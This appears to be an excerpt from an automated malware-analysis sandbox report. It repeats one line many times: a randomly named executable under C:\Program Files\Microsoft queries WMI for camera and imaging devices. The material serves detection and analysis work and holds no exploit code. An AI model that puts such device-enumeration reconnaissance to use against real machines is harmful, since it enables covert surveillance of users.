                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
